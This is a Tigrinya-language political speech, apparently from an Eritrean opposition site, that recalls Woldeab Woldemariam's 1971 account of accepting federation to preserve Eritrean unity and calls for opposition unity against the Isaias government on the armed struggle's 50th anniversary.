ኣቐዲመ ከምዝገለጽኩዎ ዲሞክራስያዊ ስርዓት ንኽንተክል ወዘተ ቅድመ ዝኣገረ ኤርትራ ትበሃል ሃገር ሓድነታ ሓሊያ ትቕጽል ሙዃና ክረጋገጽ ኣለዎ፡፡ በዚ ኣጋጣሚ እዚ ኣብ ዝሓለፈ መድረኻት ንሓድነት ኤርትራ ንምርግጋጽ ክንደይ ሓላፍነታዊ ዝዀነ ናይ እንካን ሃባን (ኮምፕሮማይዝ) መስርሓት ከምዝተኻየደ ክንዝክሮ ግቡእ እዩ፡፡ እኳ ደኣ ሓደ ካብቲ ኣቦታትና ዘረከቡና ዓቢ ኣሳልጦን ዝሓደጉልና ሓደራን ሓድነት ሃገርና ኤርትራ ኢዩ፡፡

 

ምስዛ ነጥብዚኣ ብዝተተሓሓዘ ሓንቲ ትዝ ትብለኒ (ፈጺማ እውን ዘይትርሰዓኒ) ቅድሚ 40 ዓመት ብእዝነይ ዝሰማዕኩዋ ዘረባ ነፍሰሄር ወልደአብ ወልደማርያም ኣላ፡፡ ብወርሒ ሕዳር 1971 - ኣነ ኣብ ከተማ ኒውዮርክ ተመሃራይ ኣብ ዝነበርኩሉ ጊዜ - ኣቶ ወልደአብን አቶ ዖስማን ሰበን ዶክ. ጣህር ኑርን ንሕቡራት መንግስታት ጥርዓን ከቕርቡ መጺኦምስ ንእግረ-መንገዶም ንኤርትራውያን ኣኼባ ገበሩልና፡፡ ኣቶ ወልደአብ ኣብ ዘረባኦም ብዙሕ ታሪኽ-ሓዘል ሕቶታት ኣብሪሆምልና፤ ብዛዕባ ኣመጻጽኣ ፈደረሽን ክገልጹ ከለዉ ኸአ ከምዚ ዝስዕብ በሉና፡ “ስምዑ! ነቲ ፈደረሽን ዝተባህለ ነገር ንሕና ኣቦታትኩም ዘይተቐበልናዮ ከይመስለኩም፤ ተቐቢልናዮ ኢና፤ ኩላትና ተቐቢልናዮ ኢና፤ እቶም ነጻነት ንብል ዝነበርና ስለምንታይ ተቐቢልናዮ? ባህ ስለዝበለና ወይ ስለዝመረጽናዮ ኣይኰነን፤ እቶም ሙሉእ ኣንድነት ምስ ኢትዮጵያ ዝብሉ ዝነበሩ እውን ንፈደረሽን ዝተቐበሉዎ ስለዝፈተዉዎ ወይ ስለዝመረጽዎ ኣይኰነን፡፡ በቲ እዋንቲ ህዝቢ ኤርትራ ኣብ ክልተ ተኸፊሉ ነበረ፤ ገሊኡ ኤርትራ ዝተፈልየት ነጻ ሃገር ክትከውን ደለየ፤ ገሊኡ ኸአ ኤርትራ ፈጺማ ኣካል ኢትዮጵያ ክትከውን ደለየ፡፡ ከምዚ ስለዝዀነ ኣብ ሓደ እዋንስ ኤርትራ ኣብ ክልተ ክትክፈል - ገሊኡ ንሱዳን ክኸይድ፡ ገሊኡ ኸአ ናብ ኢትዮጵያ ክሕወስ - ዝብል ሓሳብ እውን ነይሩ ኢዩ፡፡ ዝዀነ ዀይኑ እቲ ነጻነትን ኣንድነትን ዝብል ፍልልያት ንሃገርና ክፈናጭላ ዝኽእል ሙዃኑ ብሩህ ኰነ፡፡ ኣብ መወዳእታኡ ፈደረሽን - ማለት ንኤርትራ ናይ ውሽጣዊ ምምሕዳር መሰል ዝህብ ዝምድና - ዝብል ሓሳብ ቀሪቡ ብኹሉ ተቐባልነት ረኸበ፡፡” (ነዚ ዘረባ አቶ ወልደአብ ብሓንጐለይ ከምዝዝክሮ እየ ዝገልፆ ዘለኹ እሞ፡ ብኣሰራርዓ ቃላቱ ልክዕ ከምቲ ናቶም ኣበሃህላ ኣይኰነን፣ ክኸውን እውን ከምዘይክእል ተረድኡለይ፡፡)

 

ነስተውዕል እምበኣር! ፈደረሽን ከም መተዓረቒ ወይ ማእከላይ ፍታሕ ኢዩ ቀሪቡ ተቐባልነት ዝረኸበ፡ እምበር ዝመረጾ ኤርትራዊ ፖለቲካዊ ማሕበር ኣይነበረን፡፡ ኩለን እተን ዝተፈላለያ ማሕበራት ፖለቲካ ተቐቢለናኦ፤ ኣቶ ወልደአብ ከምዝበሉዎ “ፈደረሽን ተቐቢልናዮ፤ ሃገር ከይትፈናጨል ኢልና ተቐቢልናዮ!!” ስለዚ ነስተውዕል፡ ኣቦታትና - ኣንድነት ዝብሉ ዝነበሩን ነጻነት ዝብሉ ዝነበሩን - መታን ኤርትራ ከይትፈናጨል ንፈደረሽን ተቐቢሎም፡፡ ሕሰቡዎ፡ ምእንቲ ሓድነት ኤርትራ ክሕሎ፡ ምእንቲ ኤርትራ ከይትፈናጨል ነቲ ምርጫኦም ዝነበረ - ነጻነት ይኹን ኣንድነት - ገዲፎም ንፈደረሽን ከም ማእከላይ ፍታሕ ክቕበሉ ከለዉ ንሓድነት ኤርትራ ክሳብ ክንደይ ቀዳምነት ከምዝሃቡዎ!! ምስዚ ብዝተሓሓዘ ከኣ ኣብ ኩሉ ውድባት እናተጋደሉ ህይወቶም ዝሃቡ ስውኣት ንሓንቲ ኤርትራ ኢሎም ኢዮም፡ እምበር ንፍሉያት ብሄራትዶ ንፍሉያት ኣውራጃታት አሎም ከምዘይነበሩ ክርሳዕ የብሉን፡፡

 

ሓድነት ኤርትራ ሓደ ካብቲ ኣቦታትናን ስዉኣትናን ዝገደፉልና ክቡር ውርሻታትን ረዚን ሕድርታትን ኢዩ፡፡ ስለዚ እምበኣር መሰል ብሄራት ክሳብ ምግንጻል እናበልካ ንሓድነት ኤርትራ ኣብ ሓደጋ ዘእቱ ወፈራ ምክያድ፡ ኣዕናዊ ግደ ጥራይ ዘይኰነ ሕድሪ ኣቦታትናን ስዉኣትናን ምጥላም እውን ሙዃኑ ክፍለጥ ኣለዎ፡፡ ብኽድዓት ሃገርን ብጥልመት ሓደራን ዝምዘን ታሪኻዊ ገበን ኢዩ፡፡

 

ኣብ ትሕቲ መሪሕነት ነብስሄር ዓብደላ እድሪስ ተ.ሓ.ኤ. ንሓድነት ኤርትራ ደው ኢላ ኣብ ጉዳይ ብሄረሰባትና ዲሞክራስያውን ሓላፍነታውን መርገጽ ከምዝነበራን፡ ገናውን ከምዘለዋን እርዳእ፡፡ እዚ ሓድነታዊ መርገጽዚ ከም ውርሻ ዓብደላ እድሪስን ቅድሚኡ ዝሓለፉ፡ ሓሚድ እድሪስ ዓወተ ዝርከቦም ኣቦታትን ተኸቢሩ ክቕጽል ሙዃኑ እኣምን፡፡

 

ኣብዚ መበል 50 ዓመት ምጅማር ብረታዊ ሰውራና እንዝክረሉ እዋን እምበኣር፡ ሰውራና ኣብ ጉዕዞኡ ዝተጨውየ ሙዃኑን ናይ ሕጂ ሽግራትና ኸኣ - እንኰላይ እቲ ንሕቶ ብሄረሰባት ዝምልከት - ውጽኢት እቲ ጭውያ ሙዃኑን ኣዕሚቕና ክንርዳእ የድሊ፡፡ ተረዲእና ኸኣ ንዳግመውነና ሰውራና ክንጓየ ይግባእ፡፡ ሰውራና ዳግም ምስ ወነንና ኢና፡ ንመንግስቲ ኢሳያስ ኣውዲቕና፡ ኩለን ብሄራትና ዲሞክራስያዊ መሰላተን ተኸቢሩ፡ ብሰላም ዝነብራሉን ዝምዕብላሉን ሃዋሁው ሓቀኛ ነጻነት ኣብ ኤርትራ ከነስፍን እንኽእል፡፡ እምበኣር እዚ ቅዱስ ዕላማዚ ንኽማላእ መታን፡ ምርድዳእ ንኸነዘውትር፡ ሓድነትና ንኸነደልድል፡ ጻዕርታትና፣ ንኸነደይብ፡ ቃልስና ከኣ ንኸነሐይል እናተላበኹ መልእኽተይ እድምድም፡፡

 

ስለዝሰማዕኩምኒ ብዙሕ አመስግነኩም፤ የቐንየለይ!!

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player